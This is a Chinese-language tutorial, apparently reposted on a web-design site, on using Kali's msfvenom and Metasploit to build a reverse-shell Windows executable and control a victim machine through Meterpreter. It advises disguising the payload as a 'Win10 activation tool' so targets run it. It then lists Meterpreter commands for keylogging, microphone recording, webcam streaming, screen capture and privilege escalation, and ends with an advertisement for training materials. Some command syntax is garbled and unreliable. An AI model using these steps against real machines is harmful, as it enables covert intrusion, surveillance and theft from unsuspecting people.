那曲市网站建设_网站建设公司_Angular_seo优化
2026/1/7 18:03:24 网站建设 项目流程

网络安全入门到精通:meterpreter渗透测试技术详解,干货满满,建议收藏学习!

本文详细介绍了使用Kali Linux和meterpreter进行渗透测试的完整流程,包括进入管理员模式、生成可执行文件、配置参数、获取靶机访问权限等步骤,并列举了丰富的meterpreter命令用于监控靶机、文件操作、键盘记录、音频录制、摄像头操作等。该教程适合网络安全初学者,通过实际操作学习渗透测试技术,提供了从基础到进阶的学习路径。


一:渗透流程

1.进入管理员模式

命令:sudo su

解释:不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令

提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可

2.生成可执行文件

命令: msfvenom -p windows/meterpreter/reverse tcp LHOST=<本地ip>LPORT=<本地端口号>-f exe -0<文件名>.exe

解释: 本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址

本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就行

文件名可以随便写自己喜欢的名字,比如写Win10激活工具,可能更容易让目标主机上钩当然MSF也可以用来渗透手机、mac、Linux网等

这个就是Kali主机的IP地址

接下来运行命令生成文件

默认生成的文件在根目录下

把刚才生成的文件放到目标靶机Win10系统中

3.运行msfconsole命令

命令:msfconsole

4.配置参数

(1)命令:use exploit/multi/handler(选择模块)(选择攻击模块)

(2)命令:set payload windows/meterpreter/reverse tcp

(3)命令:set LhosT 192.168.32.1(填写自己主机的IP地址)

(4)命令:set lport 1111(填写刚才生成文件时的端口号)

(5)命令:show options(查看

设置参数)

(6)命令:exploit-z-j(后台执行)

参数设置好之后在靶机打开程序然后执行步骤6的命令,也可以直接输入命令exploit开始攻击

5.在靶机打开可执行文件

我们这里也可以把这个程序伪装,当用户打开就自动安装到对方电脑上面

6.查看用户

(1)命令:sessions(查看上钩的用户)

(2)命令:sessions-i 1(选择需要攻击的用户,这里选择第1个)

出现meterpreter你就已经成功的入侵的对方的电脑

二、meterpreter渗透靶机的命令

1.监控靶机电脑屏幕命令:run vnc -i

2.更多命令

查看帮助文档,命令help cmd指令: cat 读取文件内容到屏幕cd 更改目录 checksum 检索文件的校验和 cp 将源复制到目标 del 删除指定文件 dir 列出文件(ls 的别名) 下载 下载文件或目录 编辑 编辑文件 getlwd 打印本地工作目录 getwd 打印工作目录 lcd 更改本地工作目录 ls 列出本地文件 Ipwd 打印本地工作目录Is 列出文件 mkdir 创建目录 mv 将源移动到目标 pwd 打印工作目录 rm 删除指定文件 rmdir 删除目录 search 搜索文件 show mount 列出所有挂载点/逻辑驱动器 upload 上传文件或目录 pki 按名称终止进程
meterpreter命令: keyscan start 开始捕获击键(开始键盘记录) keyscan dump 转储按键缓冲(下载键盘记录 keyscan stop 停止捕获击键(停止键盘记录) record mic X秒从默认的麦克风 record mic音频记录(音频录制) webcam chat 开始视频聊天(视频,对方会有弹窗) webcam list 单摄像头(查看摄像头列表) webcam snap 采取快照从指定的摄像头(摄像头拍摄一张照片) webcam stream 播放视频流从指定的摄像头(开启摄像头监控) enumdesktops 列出所有可访问的桌面和窗口站(窗体列表) getdesktop 得到当前的Meterpreter桌面 reboot 重新启动远程计算机 shutdown 关闭远程计算机 shell 放入系统命令 shell enumdesktops 列出所有可访问的桌面和窗口站 getdesktop 获取当前的meterpreter桌面 idletime 返回远程用户空闲的秒数 keyboard send 发送击键 keyevent 发送按键事件 keyscan dump 转储击键缓冲区 keyscan start 开始捕获击键 keyscan stop 停止捕获击键 mouse 发送鼠标事件 screenshare 实时观看远程用户桌面 screenshot 抓取交互式桌面的屏幕截图 setdesktop 更改 Meterpreters 当前桌面 uictl 控制一些用户界面组件 record mic 从默认麦克风录制音频 X秒 webcam chat 开始视频聊天 webcam list 列出网络摄像头 webcam stream 播放来自指定网络摄像头的视频流 play 在目标系统上播放波形音频文件 (.wav)getsystem 尝试将您的权限提升到本地系统的权限 execute -fnotepad 打开记事本

把文件上传到靶机命令

把文件下载到主机命令

文章来自网上,侵权请联系博主

互动话题:如果你想学习更多网安方面的知识和工具,可以看看以下题外话!

学习资源

如果你是也准备转行学习网络安全(黑客)或者正在学习,这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你

知识库由360智榜样学习中心独家打造出品,旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力,熟练掌握基础攻防到深度对抗。


1、知识库价值

深度: 本知识库超越常规工具手册,深入剖析攻击技术的底层原理与高级防御策略,并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等,提供了独到的技术视角和实战验证过的对抗方案。

广度: 面向企业安全建设的核心场景(渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营),本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点,是应对复杂攻防挑战的实用指南。

实战性: 知识库内容源于真实攻防对抗和大型演练实践,通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。

2、 部分核心内容展示

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式,既夯实基础技能,更深入高阶对抗技术。

内容组织紧密结合攻防场景,辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合,是你学习过程中好帮手。

1、网络安全意识

2、Linux操作系统

3、WEB架构基础与HTTP协议

4、Web渗透测试

5、渗透测试案例分享

6、渗透测试实战技巧

7、攻防对战实战

8、CTF之MISC实战讲解

3、适合学习的人群

一、基础适配人群

  1. 零基础转型者‌:适合计算机零基础但愿意系统学习的人群,资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌;
  2. 开发/运维人员‌:具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能,实现职业方向拓展‌或者转行就业;
  3. 应届毕业生‌:计算机相关专业学生可通过资料构建完整的网络安全知识体系,缩短企业用人适应期‌;

二、能力提升适配

1、‌技术爱好者‌:适合对攻防技术有强烈兴趣,希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌;

2、安全从业者‌:帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌;

3、‌合规需求者‌:包含等保规范、安全策略制定等内容,适合需要应对合规审计的企业人员‌;

因篇幅有限,仅展示部分资料,完整版的网络安全学习资料已经上传CSDN,朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询